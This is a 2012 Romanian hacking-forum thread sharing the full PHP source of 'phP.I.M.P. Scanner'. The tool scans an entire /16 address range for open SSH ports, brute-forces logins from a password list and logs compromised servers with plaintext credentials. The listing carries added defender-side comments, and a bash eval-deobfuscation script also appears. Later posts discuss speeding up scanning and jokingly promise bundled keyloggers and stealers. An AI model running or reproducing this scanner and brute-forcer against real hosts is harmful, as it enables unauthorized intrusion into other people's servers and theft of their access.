adonisslanic Posted June 25, 2012 Report Posted June 25, 2012 (edited) Sql_err404 Edited December 18, 2012 by adonisslanic 9 1 Quote
denjacker Posted June 25, 2012 Report Posted June 25, 2012 Felicitari baieti si la mai multe ! instig la + rep ptr. amandoi Quote
Irk Posted June 25, 2012 Report Posted June 25, 2012 (edited)
<?php
/*
 * Command-line script with two actions, selected by the "a" argument:
 *   a=scan c=A.B  - scan(): TCP connect to port 22 on every address from
 *                   A.B.0.0 to A.B.255.255 and append each address that
 *                   accepts the connection to good_ips.txt.
 *   a=brute       - brute(): for each address in good_ips.txt, try every
 *                   "user pass" line of data.txt through phpseclib's
 *                   Net_SSH2 and append successful logins to found.txt.
 * Without an "a" argument the script falls through to scan().
 *
 * What this activity looks like from the defending side:
 *   - Scan phase: one source walking a /16 in address order on 22/tcp,
 *     completing the TCP handshake and then sending nothing. OpenSSH
 *     usually records such banner-less connections (wording varies by
 *     version; check your own logs).
 *   - Brute phase: a fresh SSH connection per credential pair, one
 *     password attempt each, stopping at the first success per host.
 *     It shows up as a burst of failed password authentications from one
 *     source across many user names.
 *   - phpseclib identifies itself in the SSH client version string unless
 *     the caller changes it, and nothing in this script does. That is
 *     presumably usable as a detection signal; confirm the exact string
 *     against the library version bundled in libs/phpseclib.
 *   - Mitigations that remove the attack surface: key-only authentication
 *     (sshd `PasswordAuthentication no`), a low `MaxAuthTries`, source
 *     banning/rate limiting (fail2ban-style or at the firewall), and not
 *     exposing 22/tcp to untrusted networks.
 *   - Artifacts left next to the script on the operator's host:
 *     good_ips.txt, data.txt and found.txt (plaintext "ip user:pass").
 */

// Silences all PHP warnings/notices (e.g. those raised by failed connects).
error_reporting(0);
// Re-uses $_GET for CLI arguments: "a=scan c=192.168" becomes $_GET['a'], $_GET['c'].
parse_str(implode('&', array_slice($argv, 1)), $_GET);
$path = dirname(__FILE__);
// Net_SSH2 is loaded from a phpseclib copy expected under libs/ beside the script.
set_include_path("{$path}/libs/phpseclib");
require_once("Net/SSH2.php");
// "-help" and "-disclaimer" arrive as keys with empty values after parse_str().
if (isset($_GET['-help'])) {
    credits();
    help();
    die();
}
if (isset($_GET['-disclaimer'])) {
    disclaimer();
    die();
}
// Dispatch on the requested action; a missing or empty "a" defaults to scan().
if (isset($_GET['a']) && !empty($_GET['a'])) {
    switch ($_GET['a']) {
        case("scan"):
            scan();
            break;
        case("brute"):
            brute();
            break;
        default:
            die("\n\nThere's no action with this name.\n\n");
    }
} else scan();

/**
 * Sweeps the /16 named by $_GET['c'] ("A.B") for hosts accepting TCP on port 22.
 *
 * Reads $_GET['c'], writes hits through write_good_ip(), prints a progress
 * screen after every probe and ends the process with die() in all paths.
 */
function scan()
{
    if (isset($_GET['c']) && !empty($_GET['c'])) {
        $expl = explode(".", $_GET['c']);
        // Accepts exactly two dot-separated parts, each compared loosely against 1..255.
        if (count($expl) == 2 && $expl[0] >= 1 && $expl[0] <= 255 && $expl[1] >= 1 && $expl[1] <= 255) {
            $start_time = start_time();
            unset($expl);
            // Assigned here but not used again in this function.
            $good_ips = array();
            $k = 0; // addresses that accepted the connection
            $q = 0; // addresses probed so far
            for ($i = 0; $i <= 255; $i++) {
                for ($j = 0; $j <= 255; $j++) {
                    $ip = "{$_GET['c']}.{$i}.{$j}";
                    // Full TCP connect with a 0.2 s timeout. The returned handle is not
                    // stored, so the script never calls fclose() on it and sends no data.
                    if (fsockopen($ip, 22, $errno, $errstr, 0.2)) {
                        write_good_ip($ip);
                        $k++;
                    }
                    $q++;
                    // Redraw the status screen: push old output away, then banner + counters.
                    clear_wannabe();
                    credits();
                    echo "Current ip: {$ip} / {$_GET['c']}.255.255\n";
                    echo "Found: {$k}\n";
                    echo "Elapsed time: " . number_format(elapsed_time($start_time), 1) . " sec.\n";
                    // 65536 = 256 * 256 addresses in the /16.
                    echo "Done: " . number_format(percentage($q, 65536), 3) . "%\n";
                }
            }
            die("\n\nI've found {$k} ip(s)\n\n");
        } else {
            credits();
            die("The class must be like \"192.168\", not like \"{$_GET['c']}\"\n\n");
        }
    } else {
        credits();
        die("You must specify an ip class like \"scanner.php c=192.168\"\n\n");
    }
}

/**
 * Password-guessing pass over the scan results.
 *
 * Reads good_ips.txt (one address per line) and data.txt (one "user pass"
 * pair per line, space separated) from the script directory, opens a new
 * Net_SSH2 session for every pair, records the first working pair per host
 * through write_found() and ends the process with die().
 */
function brute()
{
    $path = dirname(__FILE__);
    $ips = "{$path}/good_ips.txt";
    $data = "{$path}/data.txt";
    // Both variables are re-used: first the file path, then the file contents.
    $ips = file_get_contents($ips);
    $data = file_get_contents($data);
    if (!empty($ips) && $ips != null && $ips != "\n") {
        if (!empty($data) && $data != null && $data != "\n") {
            $start_time = start_time();
            $ips = explode("\n", $ips);
            // Drops the last element, presumably the empty string after a trailing newline.
            unset($ips[count($ips) - 1]);
            $ips_count = count($ips);
            $data = explode("\n", $data);
            unset($data[count($data) - 1]);
            $data_count = count($data);
            $k = 0; // hosts iterated
            $d = 0; // credential attempts, counted across all hosts
            $f = 0; // successful logins
            foreach ($ips as $key => $ip) {
                $k++;
                // The inner loop re-uses $key from the outer loop.
                foreach ($data as $key => $value) {
                    $value = explode(" ", $value);
                    $d++;
                    $user = trim($value[0]);
                    $pass = trim($value[1]);
                    // One new SSH connection and one password attempt per pair.
                    $ssh = new Net_SSH2($ip);
                    if ($ssh->login($user, $pass)) {
                        write_found($ip, $user, $pass);
                        $f++;
                        // First working pair ends the attempts against this host.
                        break;
                    }
                    clear_wannabe();
                    credits();
                    echo "Current ip: {$ip} ({$k}/{$ips_count})\n";
                    echo "Current data: {$user}:{$pass} ({$d}/{$data_count})\n";
                    echo "Found: {$f}\n";
                    echo "Elapsed time: " . number_format(elapsed_time($start_time), 1) . " sec.\n";
                    unset($ssh);
                }
            }
            // The closing message prints $k (hosts iterated); $f holds the login count.
            die("\n\nI've found {$k} server(s)\n\n");
        } else {
            credits();
            die("It seems like there is no data in data.txt\n\n");
        }
    } else {
        credits();
        die("\n\nIt seems like there are no ips in good_ips.txt\n\n");
    }
}

/**
 * Appends "ip user:pass" to found.txt in the script directory.
 *
 * The line is written only when `!strpos($f, $ip)` holds, i.e. strpos()
 * returned false or 0 for the current file contents. Credentials are stored
 * in plaintext, which makes this file a primary forensic artifact.
 */
function write_found($ip, $user, $pass)
{
    $path = dirname(__FILE__);
    $path = "{$path}/found.txt";
    $f = file_get_contents($path);
    if (!strpos($f, $ip)) {
        $file = fopen($path, "a");
        fwrite($file, "{$ip} {$user}:{$pass}\n");
        fclose($file);
    }
}

/**
 * Appends an address to good_ips.txt in the script directory, using the same
 * `!strpos(...)` condition as write_found().
 */
function write_good_ip($ip)
{
    $path = dirname(__FILE__);
    $path = "{$path}/good_ips.txt";
    $f = file_get_contents($path);
    if (!strpos($f, $ip)) {
        $file = fopen($path, "a");
        fwrite($file, "{$ip}\n");
        fclose($file);
    }
}

/**
 * Prints 151 newlines; used before each status redraw in place of a real
 * terminal clear.
 */
function clear_wannabe()
{
    for ($i = 0; $i <= 150; $i++) {
        echo "\n";
    }
}

/**
 * Returns $what as a percentage of $butt when $what <= $butt; otherwise
 * returns a message string instead of a number.
 */
function percentage($what, $butt)
{
    $return = "";
    if ($what <= $butt) {
        $return = ($what / $butt) * 100;
    } else $return = "I said what what in the butt, in this case, the what is bigger than the butt :(";
    return $return;
}

/**
 * Returns the current time as seconds plus fractional seconds, built from
 * the two space-separated parts of microtime().
 */
function start_time()
{
    $mtime = microtime();
    $mtime = explode(" ", $mtime);
    $mtime = $mtime[1] + $mtime[0];
    return $mtime;
}

/**
 * Returns the seconds elapsed since a value obtained from start_time().
 */
function elapsed_time($start_time)
{
    $mtime = microtime();
    $mtime = explode(" ", $mtime);
    $mtime = $mtime[1] + $mtime[0];
    return ($mtime - $start_time);
}

/**
 * Prints the usage box: example invocations and the names of the files the
 * script generates.
 */
function help()
{
    echo "+-------------------------------------------------------------+ \n";
    echo "| | \n";
    echo "| Help section :3 | \n";
    echo "| | \n";
    echo "| proudly brought to you by 2 noobs | \n";
    echo "| | \n";
    echo "| Example of a scan: | \n";
    echo "| php scanner.php a=scan c=192.168 | \n";
    echo "| | \n";
    echo "| Example of a bruteforce against scanned results: | \n";
    echo "| php scanner.php a=brute | \n";
    echo "| | \n";
    echo "| Generated files(so you won't have to be paranoid): | \n";
    echo "| 1. good_ips.txt | \n";
    echo "| 2. found.txt | \n";
    echo "| File \"1\" contains the good ips list | \n";
    echo "| File \"2\" contains pwned servers list | \n";
    echo "| | \n";
    // The next literal spans a line break, exactly as in the posted listing.
    echo "| May the r00t be with you! 
| \n";
    echo "| (and don't forget to keep your pimp hand strong) | \n";
    echo "| | \n";
    echo "+-------------------------------------------------------------+ \n\n";
}

/**
 * Prints the tool banner (name, version, authors).
 */
function credits()
{
    echo "\n\n";
    echo "\t\t+-----------------------------+\n";
    echo "\t\t| phP.I.M.P. Scanner |\n";
    echo "\t\t| [v1.0] |\n";
    echo "\t\t| |\n";
    echo "\t\t| by bogdannbv & adonisslanic |\n";
    echo "\t\t+-----------------------------+\n\n";
}

/**
 * Prints the authors' disclaimer text.
 */
function disclaimer()
{
    echo "\n";
    echo " ~~Disclaimer~~ \n";
    echo "\n";
    echo " WE DO NOT SUPPORT HACKING! \n";
    echo "\n";
    echo " THIS IS A SECURITY TESTING TOOL! \n";
    echo "\n";
    echo " THIS TOOL IS MENT TO BE USED ONLY ON YOUR OWN HOME NETWORK! \n";
    echo "\n";
    echo " DO NOT USE IT OUTSIDE YOUR NETWORK. \n";
    echo "\n";
    echo " IF YOU GET IN TROUBLE BY USING THIS TOOL IT IS JUST YOUR FAULT. \n";
    echo "\n";
    echo "WE ARE NOT RESPONSIBLE FOR ANY KIND OF DAMAGE THAT THIS TOOL MAY CAUSE. \n";
    echo " *Possbile Damages : -cat bursting into flames; \n";
    echo " -xmass tree's lights fail; \n";
    echo " -getting robbed by an evil clown; \n";
    echo " -no more puding left in the fridge ; \n";
    echo "\n";
    echo " USE THIS SOFTWARE ON YOUR OWN RISK, YOU'RE ON YOUR OWN!! \n";
    echo "\n";
    echo " WE ARE RESPONSIBLE FOR NOTHING! \n";
    echo "\n";
}
Edited June 25, 2012 by MrRip Quote
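shark0der Posted June 25, 2012 Report Posted June 25, 2012
# Peels layered eval() obfuscation from numbered PHP files (bash).
#
# Starting at 1.php: if the current layer has exactly one line containing
# "eval", keep a copy as N.original.php, rewrite "eval(" to "echo (" so the
# layer prints its payload instead of running it, and save that output as
# the next layer (N+1).php. Stops at the first layer without a single eval line.
#
# Only the rewritten eval is neutralised: every other statement in a layer
# still executes when php runs it. Work in a disposable VM or container with
# no network access and no credentials on disk.
i=0
while true; do
    i=$((i + 1))
    j=$((i + 1))
    layer="${i}.php"
    next="${j}.php"

    # Count lines mentioning eval; a missing layer counts as zero and ends the run.
    if [ -f "$layer" ]; then
        c=$(grep -c eval "$layer")
    else
        c=0
    fi

    if [ "$c" -eq 1 ]; then
        cp "$layer" "${i}.original.php"
        sed -i 's/eval(/echo (/' "$layer"

        # The count above matches any "eval", but sed rewrites only the literal
        # "eval(" once per line. If something like "eval (" or a second eval
        # survived, running the file would execute the payload, so stop here.
        if grep -q eval "$layer"; then
            echo "eval still present in $layer after rewrite; not executing, inspect by hand"
            break
        fi

        php "$layer" > "$next"
        echo created "$next"
        echo press any key to continue
        read -r
    else
        echo done :\)
        break
    fi
done
Quote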
BogdanNBV Posted June 25, 2012 Report Posted June 25, 2012 (edited) Shhhh haideti sa va zic un secret, dar sa nu mai spuneti la nimeni, se pare ca deasupra mea sunt niste hiecari profesionisti!@Irk: in lista mea de Eroi PRO 1336.9 H!3c4r! esti pe locul 2, deoarece pe locul 1 poate fi doar "shark0der". Edited June 25, 2012 by BogdanNBV 2 Quote
Irk Posted June 26, 2012 Report Posted June 26, 2012 (edited) big up shark0der.bogdannbv dar de cine ati ascuns voi sursa aia, copii? Edited June 26, 2012 by Irk Quote
Vlachs Posted June 26, 2012 Report Posted June 26, 2012 big up shark0der.bogdannbv dar de cine ati ascuns voi sursa aia, copii?De ce va bagati aiurea in seama, mai ales tu, care este motivul, vrei sa faci pe interesantul ? Quote
Irk Posted June 26, 2012 Report Posted June 26, 2012 cum adica intelegi criptarea? ce-i aici, microsoft, apple? n-ar trebui sa ne ajutam si sa nu ascundem surse, mai ales pentru niste cod de 2 bani? atat zic. Quote
Vlachs Posted June 26, 2012 Report Posted June 26, 2012 cum adica intelegi criptarea? ce-i aici, microsoft, apple? n-ar trebui sa ne ajutam si sa nu ascundem surse, mai ales pentru niste cod de 2 bani? atat zic.Si tu cu ce ajuti, cu ce ai ajutat pana acum, ai 7 posturi din care 3 le-ai facut aici, ce gandire tampita Quote
adonisslanic Posted June 26, 2012 Author Report Posted June 26, 2012 Cei care sunt emo ca am ascuns sursa "degeaba", era ascunsa just for trolling purposes, la fel ca si modul in care a fost creat scannerul:bogdannbv: ba, da-mi idee de site adonisslanic: ssh scanner xDbogdannbv: site? adonisslanic: nu, CLI PHP script xDChiar nu ii inteleg pe cei din posturile anterioare care s-au suparat ca am "criptat" sursa ) e usor de decriptat, cine vrea sa faca asta, e binevenit =(^-^)= (oricum a pus-o Irk ) Quote
BogdanNBV Posted June 26, 2012 Report Posted June 26, 2012 Oricum, daca Irk ala reuseste sa faca crack la Mozilla Firefox sau la Open Office, va ajunge pe locul 1 in lista mea... Frate, cum a zis si redcoder, l-am ascuns pentru leecheri ca sa nu schimbe numele noastre din el, dar ma rog, urmatoarele versiuni, daca vor mai exista altele, fiecare copie a scriptului va avea parola proprie si scriptul + parola nu va mai fi asa public, avem niste idei interesante, nu ca asta, asta a fost facut in graba, repede, fara a fi gandit prea mult la el. Quote
DuTy^ Posted June 26, 2012 Report Posted June 26, 2012 Blow jo.. pardon Good job. Next time, daca aveti nevoie ma bag si eu... mai o idee mai un cod Quote
BogdanNBV Posted June 26, 2012 Report Posted June 26, 2012 Da, merge greu, de aceea in versiunea urmatoare urmeaza niste modificari majore, el a fost facut, cum am mai spus, in graba, fara a ne gandi prea mult la el, vom experimenta si vom incerca sa-l facem si mai rapid, si mai securizat @DuTy^: trimite-mi un MP cu o adresa de email sau id de yahoo messenger, sa vorbim, poate ai tu niste idei buna, apropo, nu ala este id-ul meu care l-ai intrebat pe adonis xD Quote
Irk Posted June 26, 2012 Report Posted June 26, 2012 (edited) Php nu e multithreaded, de-aia se scriu scannerele in python sau ruby. O varianta pentru coderii de php care vor threaduri e extensia pcntl: PHP pcntl: Basic usage example. Cat despre protectia codului: daca nu acceptati ca aveti doar de invatat din open source, bafta. Eu unul caut intai cunostinte, abia apoi bani. Daca vreti sa discutam cod php pe viitor ne auzim pe github, pentru ca n-o sa-mi para mereu interesant sa va sparg criptarile copilaresti. Edited June 26, 2012 by Irk 1 Quote
ForTestingPurposes Posted June 26, 2012 Report Posted June 26, 2012 (edited) ce este acest scanner si ce face el mai exact?SUNT NOOB, nu-ti convine? mata-i grasa Edited June 26, 2012 by ForTestingPurposes Quote
ForTestingPurposes Posted June 27, 2012 Report Posted June 27, 2012 Let me google that for youCand predic te vindec cu-n debit puternic de cuvinte de spirit sau te-aduc intr-un punct termic, critic si te termin vremelnic ca pot fii nemernic si cinic. Quote
Vlachs Posted June 27, 2012 Report Posted June 27, 2012 Cand predic te vindec cu-n debit puternic de cuvinte de spirit sau te-aduc intr-un punct termic, critic si te termin vremelnic ca pot fii nemernic si cinic.Urmatorul post iti aduce ban. Quote
Irk Posted June 28, 2012 Report Posted June 28, 2012 si mai e o faza cu criptarea codului (motiv pentru care l-am si decriptat, de altfel): cum sa ai incredere ca nu-i ceva payload acolo? Quote
BogdanNBV Posted June 28, 2012 Report Posted June 28, 2012 (edited) @demisec: Da, scanner-ul va putea folosi mai multe procese simultan, deja este in stare sa scaneze, cat despre ce ai zis tu cu thread-urile, pai, sincer sa fiu, deocamdata, daca ii dau sa scaneze 255 ip-uri, impartite la 6 procese, le scaneaza instant, dureaza mai mult afisarea mesajelor de debugging puse pentru a vedea cand porneste un proces si cand se opreste, si nu vom face cum spui tu, daca un proces isi termina lucrul, sa mai ia si de la altul, deoarece procesele se incheie toate aproape simultan, reusind acest lucru in urma a 4 ore de gandiri intense si cod scris si sters intruna.I-am adaugat un alt fel de comenzi, mai logice, acum poti da o anumita arie pe care sa o scaneze, de exemplu: "192.168.232.0-192.168.234.255", deci iti poti selecta cat, ce si cum sa scaneze, in plus am mai adaugat o valoare a puterii de scanare / bruteforce, care va avea valori de la 1-5, mai multe detalii vor urma sa apara @Irk: In versiunea asta vom include in fisierul de 20 kb urmatoarele: 3 stealer-e, 8 keylogger-e, 200 exploit-uri linux, pentru fiecare distributie existenta ( 24 numai pentru RedHat gasite de mine personal), si 30 pentru Mac OS Edited June 28, 2012 by BogdanNBV Quote
kNigHt Posted June 28, 2012 Report Posted June 28, 2012 s-au vazut si payloaduri mai destepte.Daca esti asa de sceptic de ce nu-i dai decode la fisier? La cum pui problema nu cred ca ti-e greu sa-ti faci un script care sa dea base64 decode de 15-20 de ori sau de cate ori era encodat scriptul.ON: Chiar daca PHP nu are suport nativ pentru multithread, puteti da un system('script.php') cu anumite argumente, astfel scriptul se apeleaza pe el insusi, procesul ramanand activ, cu niste artificii de programare ar merge bine ideea. Quote
Irk Posted June 28, 2012 Report Posted June 28, 2012 Daca esti asa de sceptic de ce nu-i dai decode la fisier? La cum pui problema nu cred ca ti-e greu sa-ti faci un script care sa dea base64 decode de 15-20 de ori sau de cate ori era encodat scriptul.ON: Chiar daca PHP nu are suport nativ pentru multithread, puteti da un system('script.php') cu anumite argumente, astfel scriptul se apeleaza pe el insusi, procesul ramanand activ, cu niste artificii de programare ar merge bine ideea.1) am publicat deja sursa tot in threadul asta2) am mentionat deja o metoda mai buna pentru multithreading in php. Quote
adonisslanic Posted June 28, 2012 Author Report Posted June 28, 2012 Irk, fii useful si posteaza un scanner in php aici, noi intre timp facem ceva serios in Python Multumesc anticipat, sunt sigur ca va fi epic scannerul tau Quote
Irk Posted June 28, 2012 Report Posted June 28, 2012 Nu am facut pan-acum decat critica constructiva si autorii n-au facut decat sa fasaie ca sifonul in loc sa ia notite si sa zica multumesc nenea.Daca chiar vroiai sa ajuti comunitatea de coderi php, din nou, il faceai in php5.3.5+ oop, il puneai pe github, lasai lumea sa faca fork si sa dezvolte mai departe.Codul ala-i mai mult de C decat de php, e plin de texte de cacat si nici nu prea isi face treaba.Acum e randul vostru. Invatati din ce zic sau va agitati mai departe, dar lumea merge inainte si merge pe calea despre care vorbesc eu aici. Quote